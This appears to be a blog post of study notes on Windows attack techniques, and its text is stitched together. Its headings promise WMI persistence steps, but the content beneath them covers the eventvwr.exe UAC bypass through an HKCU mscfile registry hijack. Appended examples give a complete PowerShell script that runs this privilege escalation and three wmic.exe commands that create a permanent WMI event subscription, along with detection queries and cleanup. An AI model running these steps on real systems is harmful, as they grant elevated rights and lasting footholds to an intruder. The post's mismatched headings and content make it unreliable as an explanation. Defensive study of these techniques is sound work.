Study Notes of WMI Persistence using wmic.exe

Preface: I recently studied the method Matt Graeber (@mattifestation) shared, "WMI Persistence using wmic.exe", which gave me a new understanding of WMI attack techniques. This article will combine it with earlier research…

Next, if a payload is written to the registry key HKCU\Software\Classes\mscfile\shell\open\command, eventvwr.exe executes that payload in place of the default command it would otherwise use to launch mmc.exe.

The most important point: modifying the value of HKCU\Software\Classes\mscfile\shell\open\command requires only ordinary user privileges, because HKCU is the current user's own hive.

1、Create an __EventFilter instance

The author (enigma0x3) shared a PowerShell PoC, available at: https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1

If the PoC runs successfully, it writes "Is Elevated: True" under C:\UACBypassTest.

Note: with UAC enabled, a medium-integrity process cannot create files in the root of C:\, so a file appearing there is itself proof that the payload ran elevated.

I forked the author's code, made some small modifications, and ran the following command:

C:\Windows\System32\cmd.exe /c copy c:\test\1.txt c:\1.txt

The fork is at: https://github.com/3gstudent/UAC-Bypass/blob/master/Invoke-EventVwrBypass.ps1

2、Create an __EventConsumer instance

This method differs considerably from the traditional approaches; its advantages are:

•  No files dropped on disk
•  No process injection required
•  No copying of privileged files required
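The registry hijack and the C:\ write check described above, carried out end to end as an added example (this is not the page's code, enigma0x3's PoC, or the author's fork). Assumptions: the payload is the copy command the fork uses, c:\test\1.txt already exists, and the key is removed again afterwards so it does not linger as an artifact.

```powershell
# Added example, not code from the page, enigma0x3's PoC or the author's fork.
# It plants the mscfile handler in the user hive, triggers eventvwr.exe, checks
# the result through the file system, and then removes the key.
# Assumptions: $Payload is the copy command from the fork and c:\test\1.txt exists.
$HijackKey = 'HKCU:\Software\Classes\mscfile\shell\open\command'
$Payload   = 'C:\Windows\System32\cmd.exe /c copy c:\test\1.txt c:\1.txt'

function Test-MscFileHijack {
    # Defender-side check: a default install has no mscfile entry under HKCU,
    # so its presence is a strong indicator of this technique.
    if (Test-Path $HijackKey) {
        $cmd = (Get-ItemProperty -Path $HijackKey).'(default)'
        Write-Warning "HKCU mscfile handler present: $cmd"
        return $true
    }
    return $false
}

# Plant the handler. No elevation is needed: HKCU belongs to the current user.
New-Item -Path $HijackKey -Force | Out-Null
Set-ItemProperty -Path $HijackKey -Name '(default)' -Value $Payload

# The detection check now fires, which is what a hunt query on this key sees.
Test-MscFileHijack | Out-Null

# eventvwr.exe auto-elevates, resolves the mscfile handler from HKCU before HKCR,
# and runs whatever it finds there with its high-integrity token.
Start-Process -FilePath "$env:SystemRoot\System32\eventvwr.exe"
Start-Sleep -Seconds 5

# Verify through the file system: a medium-integrity process cannot create files
# in the root of C:\, so c:\1.txt existing means the copy ran elevated.
if (Test-Path 'C:\1.txt') {
    'Copy succeeded: payload ran elevated'
} else {
    'c:\1.txt not created: payload did not run elevated'
}

# Remove the artifact so the hijack does not persist beyond this test.
Remove-Item -Path 'HKCU:\Software\Classes\mscfile' -Recurse -Force
```

The file-system check is the honest one: the PoC's "Is Elevated: True" string is written by the payload itself, whereas a file in the root of C:\ can only have been created by an elevated process. Later Windows 10 builds changed how eventvwr.exe launches its snap-in, so the trigger step applies to the builds the PoC targets; the registry check remains useful on any build because nothing legitimate creates that key.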
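The two numbered steps above name the __EventFilter and __EventConsumer instances; a working permanent subscription also needs a __FilterToConsumerBinding. The following is an added example, not the page's or Matt Graeber's own commands: the three wmic.exe CREATE calls, the enumeration a responder would run against root\subscription, and the cleanup. The names NoteFilter and NoteConsumer, the uptime window, and the notepad.exe payload are assumptions.

```powershell
# Added example, not code from the page or from Matt Graeber. Must run from an
# elevated prompt: root\subscription is writable only by administrators.
# PowerShell's --% stop-parsing token hands the rest of each line to wmic.exe
# verbatim, so the quoting is exactly what you would type at a cmd.exe prompt.
# Assumptions: the NoteFilter/NoteConsumer names, the 240-325 s uptime window,
# and notepad.exe standing in for a real payload.

# 1. __EventFilter: polls every 60 s and matches once system uptime is between
#    240 and 325 s (roughly 4-5 minutes after boot), so the payload runs once per boot.
wmic --% /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="NoteFilter", EventNameSpace="root\cimv2", QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"

# 2. __EventConsumer (here a CommandLineEventConsumer): what to run when the filter fires.
wmic --% /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="NoteConsumer", ExecutablePath="C:\Windows\System32\notepad.exe", CommandLineTemplate="C:\Windows\System32\notepad.exe"

# 3. __FilterToConsumerBinding: nothing fires until filter and consumer are tied together.
wmic --% /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"NoteFilter\"", Consumer="CommandLineEventConsumer.Name=\"NoteConsumer\""

# What a responder sees: every persistent subscription on the host. The same
# creations are logged by Sysmon (event IDs 19/20/21) and by
# Microsoft-Windows-WMI-Activity/Operational event 5861.
Get-CimInstance -Namespace root/subscription -ClassName __EventFilter |
    Select-Object Name, Query
Get-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer |
    Select-Object Name, CommandLineTemplate
Get-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding |
    Select-Object Filter, Consumer

# Cleanup: remove the binding first so nothing can fire while the other two still exist.
Get-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding |
    Where-Object { $_.Filter.Name -eq 'NoteFilter' } | Remove-CimInstance
Get-CimInstance -Namespace root/subscription -ClassName __EventFilter -Filter "Name='NoteFilter'" |
    Remove-CimInstance
Get-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Filter "Name='NoteConsumer'" |
    Remove-CimInstance
```

The point of the wmic.exe form is that it needs no script file and no PowerShell: three one-line commands from a living-off-the-land binary produce the same filter, consumer and binding a PowerShell or MOF-based implant would. wmic.exe is deprecated and no longer installed by default on current Windows 11, but the CIM cmdlets used for the enumeration and cleanup still work there, so the hunt side of this example outlives the creation side.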